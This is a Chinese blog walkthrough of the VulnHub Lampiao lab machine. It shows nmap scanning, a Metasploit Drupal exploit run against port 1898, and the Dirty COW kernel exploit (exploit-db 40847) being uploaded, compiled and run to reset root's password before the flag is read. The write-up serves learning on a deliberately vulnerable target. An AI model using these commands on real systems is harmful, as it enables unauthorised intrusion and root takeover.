• VulnHub--Lampiao-linux脏牛漏洞提权


    Lampiao

    实验目的

    拿下lampiao靶机root权限和里面的flag

    所需内容

    脏牛漏洞:
    版本:Linux kernel>=2.6.22(2007年发行,到2016年10月18日才修复)
    危害:低权限用户利用该漏洞可以在众多Linux系统上实现本地提权
    该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。
    Nmap
    nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
    Lampiao靶机:

    步骤

    网段搜索目标靶机
    查看目标靶机的开放端口
    提权
    找到flag

    开始

    靶机lampiao 网络设置成nat连接模式
    在这里插入图片描述
    Kali也同样设置为nat模式
    在这里插入图片描述
    看下nat模式下网段192.168.15.0
    在这里插入图片描述
    在kali中 kali本机ip 192.168.15.142

    在这里插入图片描述
    在这里插入图片描述我们看出来靶机 lampiao的ip为192.168.15.145
    再使用namp 扫
    在这里插入图片描述
    发现开启了 22 ssh 服务 80、1898 web 服务,drupal7 框架
    访问下80端口
    在这里插入图片描述
    再访问下1898端口
    在这里插入图片描述
    发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2
    发现有两个文件,尝试访问
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    msfconsole #进入msf
    在这里插入图片描述
    search drupal #搜索drupal框架漏洞
    在这里插入图片描述
    Use 1 使用1号漏洞
    show options #查看所有设置
    set rhosts 192.168.1.120 #设置目标ip
    set rport 1898 #设置目标端口
    run #运行
    在这里插入图片描述
    在这里插入图片描述
    发现其版本信息为 2016.7.13 < 2016.10.18,可以使用脏牛漏洞进行提权
    在这里插入图片描述
    upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
    上传cpp文件到/tmp目录下,因为该目录一般是所有用户都具有可读可写权限:
    在这里插入图片描述
    再次使用shell,进入shell终端,使用python -c 'import pty; pty.spawn(“/bin/bash”)'进入TTL终端
    在这里插入图片描述
    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil上传成功后使用gcc进行编译
    在这里插入图片描述
    再次使用./dcow > status.txt看到密码已经被重置:dirtyCowFun
    在这里插入图片描述
    成功提权
    在这里插入图片描述
    .ssh登陆,查看flag.txt文件
    在这里插入图片描述
    Flag为 9740616875908d91ddcdaa8aea3af366

  • 相关阅读:
    【SQL】数据库事务
    Docker技术入门 | Part01:Docker简介
    通过python 获取当前局域网内存在的IP和MAC
    Java版分布式微服务云开发架构 Spring Cloud+Spring Boot+Mybatis 电子招标采购系统功能清单
    MongoDB性能分析
    7-1归并排序还是插入排序
    leetCode刷题
    基于B/S架构,包括PC后台管理端、APP移动端、可视化大屏端的智慧工地源码
    别再自己瞎写工具类了,Spring Boot 内置工具类应有尽有, 建议收藏
    某医疗机构:建立S-SDLC安全开发流程,保障医疗前沿科技应用高质量发展
  • 原文地址:https://blog.csdn.net/wanghao200108/article/details/125632420